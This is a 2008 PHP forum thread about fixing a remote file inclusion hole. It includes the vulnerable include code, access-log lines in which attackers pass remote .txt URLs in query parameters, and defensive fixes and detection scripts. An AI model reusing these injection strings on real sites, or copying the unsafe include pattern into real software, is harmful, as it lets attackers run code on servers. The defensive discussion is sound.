drfate, posted November 13, 2008

Hi Everyone, I've got the following code in a PHP file which opens up a .HTM:

```php
<?php
if (isset($_GET["page"])) {
    $thepage = $_GET["page"];   // file name taken straight from the query string
    $thetype = $_GET["type"];   // extension taken straight from the query string
    include $thepage . '.' . $thetype;
}
?>
```

The problem is, this code is being exploited (see below for example). Does anyone know how to stop this?

```
189.81.16.230 - - [12/Nov/2008:15:00:13 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"
74.6.22.180 - - [12/Nov/2008:16:09:09 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsanimatedadventuresewoks&type=htm HTTP/1.0" 200 3972 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
70.38.54.118 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://masla.su/apache/idxx.txt?? HTTP/1.1" 200 15209 "-" "Mozilla/5.0"
70.38.54.118 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://masla.su/apache/idxx.txt?? HTTP/1.1" 200 15266 "-" "Mozilla/5.0"
124.0.208.252 - - [13/Nov/2008:00:41:19 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 15272 "-" "Mozilla/5.0"
124.0.208.252 - - [13/Nov/2008:00:41:19 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 15104 "-" "Mozilla/5.0"
189.81.16.230 - - [13/Nov/2008:05:38:55 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"
189.81.16.230 - - [13/Nov/2008:06:14:07 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"
```

cheers, Andrew

Source: https://forums.phpfreaks.com/topic/132631-php-code-security-exploit-php-injuction-how-do-i-fix-this/
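The log excerpt above is the kind of evidence a site owner usually has to work from, so here is a small triage script that scans Apache combined-format lines for query parameters carrying a URL scheme or a traversal sequence. This is an added example, not code from the thread; the sample lines are constructed to resemble the posted ones, with placeholder addresses and hosts, and the function names are my own.

```php
<?php
// Added example (not code from the thread): flag access-log lines whose query
// parameters carry a URL scheme, a traversal sequence or a NUL byte, which is
// the signature of the include-injection attempts shown in the post.
// Sample lines are constructed; addresses and hosts are placeholders.

$sampleLog = <<<'LOG'
203.0.113.10 - - [12/Nov/2008:15:00:13 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.example.com/dvdgeneraldisplay.php?page=http://attacker.example/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"
198.51.100.7 - - [12/Nov/2008:16:09:09 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsanimatedadventuresewoks&type=htm HTTP/1.0" 200 3972 "-" "Mozilla/5.0 (compatible; crawler)"
192.0.2.44 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://attacker.example/apache/idxx.txt?? HTTP/1.1" 200 15209 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://attacker.example/apache/idxx.txt?? HTTP/1.1" 200 15266 "-" "Mozilla/5.0"
LOG;

/** True when a parameter value is something other than a plain page name. */
function is_suspicious_value(string $value): bool
{
    return preg_match('~[a-z][a-z0-9+.-]*://~i', $value) === 1   // http://, ftp://, php://, ...
        || strpos($value, '..') !== false                          // directory traversal
        || strpos($value, "\0") !== false;                         // NUL byte after URL-decoding
}

/** Everything after the first '?' of a request target or full URL. */
function query_of(string $url): string
{
    $q = strpos($url, '?');
    return $q === false ? '' : substr($url, $q + 1);
}

/** Return the (name => value) pairs in a URL's query string whose value is suspicious. */
function suspicious_params(string $url): array
{
    $query = query_of($url);
    if ($query === '') {
        return array();
    }
    parse_str($query, $params);            // splits on '&' and URL-decodes values
    $hits = array();
    foreach ($params as $name => $value) {
        if (is_string($value) && is_suspicious_value($value)) {
            $hits[$name] = $value;
        }
    }
    return $hits;
}

/** Scan a combined-format log; returns one finding per suspicious parameter. */
function find_include_injection(string $log): array
{
    // ip ident user [time] "METHOD target proto" status size "referer" "agent"
    $pattern  = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"/';
    $findings = array();
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match($pattern, $line, $m)) {
            continue;                      // not a combined-format line
        }
        list(, $ip, $when, , $target, $status, $referer) = $m;
        // Check the request itself and the Referer: a 404 for favicon.ico still
        // carries the injected URL of the page that was loaded just before it.
        foreach (array('request' => $target, 'referer' => $referer) as $where => $url) {
            if ($url === '-') {
                continue;
            }
            foreach (suspicious_params($url) as $name => $value) {
                $findings[] = array('ip' => $ip, 'time' => $when, 'status' => (int) $status,
                                    'where' => $where, 'param' => $name, 'value' => $value);
            }
        }
    }
    return $findings;
}

foreach (find_include_injection($sampleLog) as $f) {
    printf("%s %s %d %s %s=%s\n", $f['time'], $f['ip'], $f['status'], $f['where'], $f['param'], $f['value']);
}
```

Two details matter when reading the posted log with this. Every parameter has to be inspected, not just `page`: two of the posted lines carry the remote URL in `type`. And the `favicon.ico` 404 lines only reveal the attempt through the Referer header, which is why the script scans both the request target and the referer.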
KevinM1, posted November 13, 2008

1. This has nothing to do with object oriented programming (OOP).
2. Code tags are your friends.
3. Your problem stems from not securing your incoming query strings. At all.

A simple way to fix your problem is to create a whitelist of possible page values that actually represent the pages of your site, assuming your site is small (say fewer than 20 pages). Then you can compare the incoming value with your list of legit pages.

```php
$allowedPages = array("home", "news", "contact", "faqs"); // example values... replace with your actual page names
$type = 'htm'; // extension is fixed here rather than read from the query string
$page = isset($_GET['page']) ? strtolower($_GET['page']) : ''; // make sure the incoming value is all lowercase
if (!in_array($page, $allowedPages, true)) {
    echo "I don't think so....";
} else {
    include $page . '.' . $type;
}
```
Mchl, posted November 13, 2008

Don't include when $_GET['page'] contains "http://" seems like the quickest (but not necessarily the best) solution.
drfate (author), posted November 13, 2008

> Mchl wrote: Don't include when $_GET['page'] contains "http://" seems like the quickest (but not necessarily the best) solution.

How do I fix this?
drfate (author), posted November 13, 2008

> 1. This has nothing to do with object oriented programming (OOP).
> 2. Code tags are your friends.
> 3. Your problem stems from not securing your incoming query strings. At all.
>
> A simple way to fix your problem is to create a whitelist of possible page values that actually represent the pages of your site, assuming your site is small (say fewer than 20 pages). Then you can compare the incoming value with your list of legit pages.
>
> ```php
> $allowedPages = array("home", "news", "contact", "faqs"); // example values... replace with your actual page names
> $type = 'htm'; // extension is fixed here rather than read from the query string
> $page = isset($_GET['page']) ? strtolower($_GET['page']) : ''; // make sure the incoming value is all lowercase
> if (!in_array($page, $allowedPages, true)) {
>     echo "I don't think so....";
> } else {
>     include $page . '.' . $type;
> }
> ```

Hi Nightslyr, unfortunately my site has quite a few pages, any other ideas?
corbin, posted November 13, 2008

http://www.pacote270178.xpg.com.br/teste2.txt lol..... It looks like whoever exploited your site is using your server to mass email. Depending on how many people he's spamming, you'll get some fun messages soon ;p.

First off, don't let people pass in the extension. There's no reason to. I would use just PHP pages.

Second, restrict it somehow. A good way to do it if all of the files are in the same folder (and nothing unsafe is in said folder) is to do the following:

```php
$page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default';
// only letters, digits, underscore, space and hyphen; the pattern needs delimiters
if (preg_match('/^[a-zA-Z0-9_ -]+$/', $page) && file_exists('some/folder/' . $page . '.php')) {
    require 'some/folder/' . $page . '.php';
} else {
    echo "Page not found!";
}
```
drfate (author), posted November 14, 2008

> http://www.pacote270178.xpg.com.br/teste2.txt lol..... It looks like whoever exploited your site is using your server to mass email. Depending on how many people he's spamming, you'll get some fun messages soon ;p.
>
> First off, don't let people pass in the extension. There's no reason to. I would use just PHP pages.
>
> Second, restrict it somehow. A good way to do it if all of the files are in the same folder (and nothing unsafe is in said folder) is to do the following:
>
> ```php
> $page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default';
> if (preg_match('/^[a-zA-Z0-9_ -]+$/', $page) && file_exists('some/folder/' . $page . '.php')) {
>     require 'some/folder/' . $page . '.php';
> } else {
>     echo "Page not found!";
> }
> ```

Hi Corbin, thanks for your help. Just a quick question, I have a .htaccess file which displays the following:

```apache
RewriteRule ^dvd(.*).html$ dvdgeneraldisplay.php?page=dvd/dvd$1&type=htm [L,NC]
```

and I put the following code in:

```php
<?php
$page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default';
if(preg_match('^[a-zA-Z0-9_ -]+$', $page) && file_exists('dvd/' . $page . '.php)) {
    require 'dvd/' . $page . '.php;
} else {
    echo "Page not found!";
}
?
```

Then I get the error:

```
Parse error: syntax error, unexpected T_STRING in /home2/impulse/public_html/dvdgeneraldisplay.php on line 111
```

What am I missing?
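The two suggestions in the thread (KevinM1's fixed allow-list and corbin's name pattern plus file check) both work, but the adaptation above runs into two things the page itself shows. The parse error comes from the string literals on the `file_exists` and `require` lines that are never closed (`'.php)` and `'.php;`), so PHP swallows the rest of the line into the string. Less obviously, the rewrite rule passes `page=dvd/dvd...`, and a pattern with no `/` in it would reject every legitimate page once the syntax is fixed. The script below is an added example, not code from the thread: it fixes the extension to an allow-list, permits exactly one directory segment in the name, and then confirms with `realpath` that the resolved file still sits inside the content root. `CONTENT_ROOT`, `resolve_page` and the throwaway content tree in the command-line demo are my own assumptions about the layout.

```php
<?php
// Added example, not code from the thread. Combines a fixed extension
// allow-list, a strict name pattern that accepts the "dvd/<name>" shape the
// poster's rewrite rule produces, and a realpath containment check.
// CONTENT_ROOT and the file layout are assumptions.

const CONTENT_ROOT  = __DIR__;          // directory that contains the dvd/ folder
const ALLOWED_TYPES = array('htm');     // the only extensions that may ever be included

/**
 * Resolve page/type to a file inside $root, or return null when the request
 * is malformed, names a missing file, or escapes the content tree.
 */
function resolve_page(string $page, string $type, string $root = CONTENT_ROOT): ?string
{
    // One optional directory segment plus a file name: letters, digits, '_' and '-'.
    // This rejects "http://...", "..", NUL bytes and stream wrappers before any I/O.
    if (!preg_match('~^(?:[A-Za-z0-9_-]+/)?[A-Za-z0-9_-]+$~', $page)) {
        return null;
    }
    if (!in_array($type, ALLOWED_TYPES, true)) {
        return null;                            // extension is never taken on trust
    }
    $rootReal  = realpath($root);
    $candidate = realpath($root . '/' . $page . '.' . $type);
    if ($rootReal === false || $candidate === false) {
        return null;                            // missing file
    }
    // Belt and braces: the resolved path must still lie inside the content root.
    if (strpos($candidate, $rootReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

if (PHP_SAPI !== 'cli') {
    // Web use: the same two parameters the rewrite rule passes, nothing else.
    $page = isset($_GET['page']) && is_string($_GET['page']) ? trim($_GET['page']) : '';
    $type = isset($_GET['type']) && is_string($_GET['type']) ? $_GET['type'] : 'htm';
    $file = resolve_page($page, $type);
    if ($file === null) {
        http_response_code(404);
        echo 'Page not found!';
    } else {
        include $file;
    }
} else {
    // Command-line demo against a throwaway content tree (constructed inputs).
    $root = sys_get_temp_dir() . '/include_demo';
    @mkdir($root . '/dvd', 0700, true);
    file_put_contents($root . '/dvd/dvdstarwarsclonewars.htm', '<p>sample page</p>');
    $cases = array(
        array('dvd/dvdstarwarsclonewars', 'htm'),                           // legitimate, resolves
        array('http://attacker.example/teste2.txt?', 'htm'),                // remote URL in page
        array('dvd/dvdstarwarsclonewars', 'htm/display.php?pg=http://x/'),  // payload in type
        array('dvd/nosuchpage', 'htm'),                                     // well formed, absent
    );
    foreach ($cases as $c) {
        printf("%-42s %-32s => %s\n", $c[0], $c[1], resolve_page($c[0], $c[1], $root) ?? 'rejected');
    }
}
```

One caveat that corbin's "nothing unsafe is in said folder" hints at: `include` executes any `<?php` tags it finds, whatever the file extension, so the content files under `dvd/` must not be writable by the web server user, and the allow-list on the extension is what keeps sibling `.php` scripts out of reach even when their names match the pattern.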
Daniel0, posted November 16, 2008

http://www.phpfreaks.com/tutorial/preventing-remote-file-include-attacks-with-mod-rewrite